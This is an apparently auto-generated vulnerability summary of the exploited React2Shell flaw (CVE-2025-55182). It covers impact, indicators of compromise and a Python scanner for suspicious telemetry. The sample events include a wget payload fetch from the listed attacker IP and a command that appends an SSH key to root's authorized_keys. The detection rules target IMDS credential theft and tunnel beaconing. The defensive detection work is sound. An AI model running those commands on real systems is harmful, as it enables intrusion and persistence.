Full Report
The security vulnerability known as React2Shell is being exploited by threat actors to deliver malware families like KSwapDoor and ZnDoor, according to findings from Palo Alto Networks Unit 42 and NTT Security. "KSwapDoor is a professionally engineered remote access tool designed with stealth in mind," Justin Moore, senior manager of threat intel research at Palo Alto Networks Unit 42, said in a
Analysis Summary
# Vulnerability: React2Shell Server-Side Vulnerability Leading to Remote Code Execution
## CVE Details
- CVE ID: CVE-2025-55182
- CVSS Score: 10.0 (Critical)
- CWE: Not explicitly mentioned, but related to Remote Code Execution/Improper Input Validation.
## Affected Systems
- Products: A React/Next.js component or feature (the text ties CVE-2025-55182 to the React/Next.js ecosystem without naming the specific component). The text also references CVE-2025-66478, which concerns Next.js.
- Versions: Specific vulnerable versions are **not listed** in the provided text snippet.
- Configurations: Systems running vulnerable implementations; the observed compromises frequently end in Linux backdoor deployment.
## Vulnerability Description
The vulnerability, tracked as **React2Shell (CVE-2025-55182)**, allows threat actors to run arbitrary commands on affected systems. The flaw is actively exploited to deliver Linux backdoors such as KSwapDoor and ZnDoor and to deploy post-exploitation tooling such as reverse shells (Cobalt Strike) and RMM agents (MeshAgent). The attack chains often fetch payloads from remote servers with `wget` invoked through bash commands.
## Exploitation
- Status: **Exploited in the wild**
- Complexity: Implied **Low to Medium**, as widespread exploitation by multiple APT groups (UNC-prefix groups) is reported, and simple `wget` bash commands are utilized for initial payload delivery.
- Attack Vector: **Network** (Remote Code Execution).
## Impact
- Confidentiality: **High** (Data theft, credential harvesting from IMDS endpoints).
- Integrity: **High** (Installation of persistent backdoors like KSwapDoor/ZnDoor, execution of arbitrary code).
- Availability: **High** (System compromise leading to potential denial of service or resource hijacking).
## Remediation
### Patches
- **No specific patch version numbers or vendor advisories** detailing the patched version are provided in this summary text. Users must consult vendor advisories related to CVE-2025-55182 and CVE-2025-66478 (Next.js).
### Workarounds
- No specific workarounds are provided in the text. General mitigation steps include blocking suspicious outbound connections and minimizing the attack surface until patches can be applied.
## Detection
- **Indicators of Compromise (IoCs):**
- Execution of bash commands fetching payloads using `wget` from remote servers (e.g., 45.76.155[.]14).
- Deployment of malware families: KSwapDoor, ZnDoor, MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, ANGRYREBEL (Noodle RAT).
- Post-exploitation activity involving setting up reverse shells to Cobalt Strike, dropping MeshAgent, and modifying `authorized_keys` files.
- Network connections to Cloudflare Tunnel endpoints (`*.trycloudflare.com`).
- Credential harvesting attempts targeting cloud IMDS endpoints (Azure, AWS, GCP).
- Use of secret discovery tools like TruffleHog and Gitleaks.
- **Detection Methods and Tools:** Endpoint Detection and Response (EDR) tools monitoring for unusual process execution (e.g., shell execution following web server processes), and network monitoring for beaconing to known C2 infrastructure or obscure tunneling domains.
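Added example (not code from the report, Unit 42 or NTT): a small Python scanner that applies the detection methods above to constructed telemetry lines, flagging a web server process that spawns a shell which fetches with `wget`, connections to the report's listed IP or a `trycloudflare.com` tunnel host, shell-originated IMDS access, and `authorized_keys` modification. The event format, process names and the IMDS address are assumptions.

```python
import re
# Indicators below come from the report's IoC list; process names, the IMDS address and
# every sample event are assumptions constructed for this example.
KNOWN_C2_IPS = {"45.76.155.14"}
TUNNEL_DOMAIN_RE = re.compile(r"(^|\.)trycloudflare\.com$")
IMDS_ADDR = "169.254.169.254"  # link-local metadata address used by AWS, Azure and GCP
WEB_PARENTS = {"node", "next-server", "npm"}  # assumed names of the Node/Next.js server process
SHELLS = {"bash", "sh", "dash"}

def parse_event(line):
    """Parse a constructed key=value event line; quoted values may contain spaces."""
    return {k: q or b for k, q, b in re.findall(r'(\w+)=(?:"([^"]*)"|(\S+))', line)}

def classify(event):
    """Return the names of every detection rule the event triggers (empty = benign)."""
    hits = []
    if event.get("type") == "proc":
        parent, child, cmd = event.get("parent", ""), event.get("child", ""), event.get("cmd", "")
        if parent in WEB_PARENTS and child in SHELLS:
            hits.append("web_server_spawned_shell")  # a web app has no routine need for a shell
            if re.search(r"\b(wget|curl)\b", cmd):
                hits.append("shell_fetches_remote_payload")
        if "authorized_keys" in cmd:
            hits.append("authorized_keys_modified")  # SSH persistence described in the report
    elif event.get("type") == "net":
        dst, host, proc = event.get("dst", ""), event.get("host", ""), event.get("proc", "")
        if dst in KNOWN_C2_IPS:
            hits.append("known_c2_ip")
        if TUNNEL_DOMAIN_RE.search(host):
            hits.append("cloudflare_tunnel_beacon")
        if dst == IMDS_ADDR and proc in SHELLS | {"wget", "curl"}:
            hits.append("imds_credential_access")  # only app code, not a shell, should query IMDS
    return hits

def scan(lines):
    """Return [(line_no, rules)] for every event line that fired at least one rule."""
    scored = [(n, classify(parse_event(line))) for n, line in enumerate(lines, 1)]
    return [(n, hits) for n, hits in scored if hits]

# Constructed sample telemetry: one process-spawn or outbound-connection event per line.
SAMPLE_EVENTS = [
    'type=proc parent=node child=bash cmd="bash -c \'wget http://45.76.155.14/x -O /tmp/x\'"',
    'type=proc parent=node child=node cmd="node server.js"',
    'type=net proc=wget dst=45.76.155.14 host=""',
    'type=net proc=node dst=198.51.100.10 host=api.example.com',
    'type=net proc=curl dst=169.254.169.254 host=169.254.169.254',
    'type=net proc=bash dst=203.0.113.7 host=abc-def.trycloudflare.com',
    'type=proc parent=bash child=sh cmd="sh -c \'echo ssh-ed25519 AAAA >> /root/.ssh/authorized_keys\'"',
]
```

Running `scan(SAMPLE_EVENTS)` flags lines 1, 3, 5, 6 and 7 and leaves the two benign control events untouched.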
## References
- Vendor advisories from Palo Alto Networks Unit 42 and Microsoft.
- Unit 42 Advisory: unit42.paloaltonetworks.com/cve-2025-55182-react-and-cve-2025-66478-next/ (Defanged for safety)
- Other Mentions: thehackernews . com/2025/12/react2shell-vulnerability-actively-exploited-to-deploy-linux-backdoors